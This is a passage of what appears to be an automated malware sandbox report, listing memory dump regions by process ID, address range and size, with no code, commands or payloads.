memory/1708-197-0x0000000004B50000-0x0000000004B51000-memory.dmpFilesize
4KB
-
memory/1892-189-0x0000000000000000-mapping.dmp
-
memory/1892-596-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1992-388-0x0000000000000000-mapping.dmp
-
memory/2160-256-0x0000000000000000-mapping.dmp
-
memory/2208-179-0x0000000004A90000-0x0000000004A91000-memory.dmpFilesize
4KB
-
memory/2208-180-0x0000000004A82000-0x0000000004A83000-memory.dmpFilesize
4KB
-
memory/2208-186-0x0000000004A83000-0x0000000004A84000-memory.dmpFilesize
4KB
-
memory/2208-202-0x0000000004A84000-0x0000000004A86000-memory.dmpFilesize
8KB
-
memory/2208-140-0x0000000000000000-mapping.dmp
-
memory/2208-185-0x0000000002410000-0x0000000002413000-memory.dmpFilesize
12KB
-
memory/2208-171-0x00000000020D0000-0x00000000020D4000-memory.dmpFilesize
16KB
-
memory/2208-174-0x0000000004A80000-0x0000000004A81000-memory.dmpFilesize
4KB
-
memory/2364-237-0x0000000000000000-mapping.dmp
-
memory/2376-190-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/2376-187-0x0000000004E20000-0x0000000004E21000-memory.dmpFilesize
4KB
-
memory/2376-212-0x00000000029B3000-0x00000000029B5000-memory.dmpFilesize
8KB
-
memory/2376-196-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/2376-215-0x00000000029B0000-0x00000000029B1000-memory.dmpFilesize
4KB
-
memory/2376-178-0x0000000000610000-0x0000000000611000-memory.dmpFilesize
4KB
-
memory/2376-122-0x0000000000000000-mapping.dmp
-
memory/2376-192-0x0000000004EC0000-0x0000000004EC1000-memory.dmpFilesize
4KB
-
memory/2732-115-0x00000000058E0000-0x0000000005A2A000-memory.dmpFilesize
1.3MB
-
memory/3020-205-0x0000000004F60000-0x00000000050C1000-memory.dmpFilesize
1.4MB
-
memory/3020-355-0x0000000000B00000-0x0000000000B16000-memory.dmpFilesize
88KB
-
memory/3020-352-0x00000000067C0000-0x0000000006926000-memory.dmpFilesize
1.4MB
-
memory/3036-137-0x0000000000000000-mapping.dmp
-
memory/3108-124-0x0000000000000000-mapping.dmp
-
memory/3128-471-0x0000000000400000-0x0000000002C18000-memory.dmpFilesize
40.1MB
-
memory/3128-469-0x0000000002EF0000-0x0000000002FC6000-memory.dmpFilesize
856KB
-
memory/3128-375-0x0000000000000000-mapping.dmp
-
memory/3148-258-0x0000000000000000-mapping.dmp
-
memory/3176-430-0x0000000000000000-mapping.dmp
-
memory/3412-583-0x00000000009F0000-0x00000000009F2000-memory.dmpFilesize
8KB
-
memory/3412-420-0x0000000000000000-mapping.dmp
-
memory/3488-238-0x0000000000000000-mapping.dmp
-
memory/3500-289-0x0000000000000000-mapping.dmp
-
memory/3688-219-0x0000000000400000-0x0000000000AA1000-memory.dmpFilesize
6.6MB
-
memory/3688-201-0x00000000026A0000-0x00000000026A1000-memory.dmpFilesize
4KB
-
memory/3688-208-0x00000000026D0000-0x00000000026D1000-memory.dmpFilesize
4KB
-
memory/3688-204-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/3688-211-0x00000000026E0000-0x00000000026E1000-memory.dmpFilesize
4KB
-
memory/3688-213-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/3688-146-0x0000000000000000-mapping.dmp
-
memory/3688-198-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3720-257-0x0000000000000000-mapping.dmp
-
memory/3720-267-0x0000000000030000-0x0000000000033000-memory.dmpFilesize
12KB
-
memory/3800-194-0x0000000000000000-mapping.dmp
-
memory/3888-327-0x0000000004CE4000-0x0000000004CE6000-memory.dmpFilesize
8KB
-
memory/3888-139-0x0000000000000000-mapping.dmp
-
memory/3888-311-0x0000000000400000-0x0000000002BBB000-memory.dmpFilesize
39.7MB
-
memory/3888-318-0x0000000004CE0000-0x0000000004CE1000-memory.dmpFilesize
4KB
-
memory/3888-326-0x0000000004CE3000-0x0000000004CE4000-memory.dmpFilesize
4KB
-
memory/3888-285-0x00000000001C0000-0x00000000001EF000-memory.dmpFilesize
188KB
-
memory/3888-325-0x0000000004CE2000-0x0000000004CE3000-memory.dmpFilesize
4KB
-
memory/3968-234-0x0000000000540000-0x0000000000569000-memory.dmpFilesize
164KB
-
memory/3968-351-0x0000000000C80000-0x0000000000D10000-memory.dmpFilesize
576KB
-
memory/3968-233-0x0000000001340000-0x000000000134B000-memory.dmpFilesize
44KB
-
memory/3968-231-0x0000000000000000-mapping.dmp
-
memory/3968-236-0x0000000000F30000-0x0000000001250000-memory.dmpFilesize
3.1MB
-
memory/3992-116-0x0000000000000000-mapping.dmp
-
memory/4004-416-0x0000000000000000-mapping.dmp
-
memory/4032-457-0x0000000000000000-mapping.dmp
-
memory/4048-439-0x0000000000000000-mapping.dmp
-
memory/4120-313-0x0000000000400000-0x000000000040B000-memory.dmpFilesize
44KB
-
memory/4120-303-0x00000000004014A0-mapping.dmp
-
memory/4152-384-0x0000000000000000-mapping.dmp
-
memory/4172-306-0x0000000000000000-mapping.dmp
-
memory/4172-316-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4192-373-0x000000001B660000-0x000000001B662000-memory.dmpFilesize
8KB
-
memory/4192-365-0x0000000000000000-mapping.dmp
-
memory/4272-312-0x0000000000000000-mapping.dmp
-
memory/4436-368-0x0000000000000000-mapping.dmp
-
memory/4436-380-0x0000000002AE0000-0x0000000002AE2000-memory.dmpFilesize
8KB
-
memory/4440-369-0x0000000000000000-mapping.dmp
-
memory/4440-412-0x0000000000000000-mapping.dmp
-
memory/4456-372-0x0000000000000000-mapping.dmp
-
memory/4556-337-0x0000000000000000-mapping.dmp
-
memory/4564-376-0x0000000000000000-mapping.dmp
-
memory/4564-584-0x0000000005390000-0x00000000054DA000-memory.dmpFilesize
1.3MB
-
memory/4632-344-0x0000000000418D26-mapping.dmp
-
memory/4632-353-0x0000000005130000-0x0000000005736000-memory.dmpFilesize
6.0MB
-
memory/4684-474-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4684-462-0x0000000000000000-mapping.dmp
-
memory/4760-377-0x0000000000000000-mapping.dmp
-
memory/4800-378-0x0000000000000000-mapping.dmp
-
memory/4840-357-0x0000000000000000-mapping.dmp
-
memory/4860-379-0x0000000000000000-mapping.dmp
-
memory/4972-381-0x0000000000000000-mapping.dmp
-
memory/4992-359-0x0000000000000000-mapping.dmp
-
memory/5008-395-0x0000000002EC0000-0x0000000002EC2000-memory.dmpFilesize
8KB
-
memory/5008-391-0x0000000000000000-mapping.dmp
-
memory/5072-392-0x0000000000000000-mapping.dmp
-
memory/5084-382-0x0000000000000000-mapping.dmp
-
memory/5092-362-0x0000000000000000-mapping.dmp
-
memory/5104-399-0x0000000000000000-mapping.dmp
-
memory/5104-410-0x000000001B530000-0x000000001B532000-memory.dmpFilesize
8KB
-
memory/5420-532-0x00000000008A0000-0x00000000008B0000-memory.dmpFilesize
64KB
-
memory/5420-533-0x00000000008C0000-0x0000000000A0A000-memory.dmpFilesize
1.3MB
-
memory/5592-597-0x000000001B5B0000-0x000000001B5B2000-memory.dmpFilesize
8KB
-
memory/5604-589-0x0000000002CF0000-0x0000000002E3A000-memory.dmpFilesize
1.3MB
-
memory/5604-590-0x0000000000400000-0x0000000002BC3000-memory.dmpFilesize
39.8MB
-
memory/5636-540-0x0000000005250000-0x0000000005251000-memory.dmpFilesize
4KB
-
memory/5768-594-0x0000016CF2DD0000-0x0000016CF2DD2000-memory.dmpFilesize
8KB
-
memory/5956-558-0x0000000005210000-0x0000000005211000-memory.dmpFilesize
4KB
-
memory/6004-571-0x0000000005410000-0x0000000005411000-memory.dmpFilesize
4KB
-
memory/6032-574-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB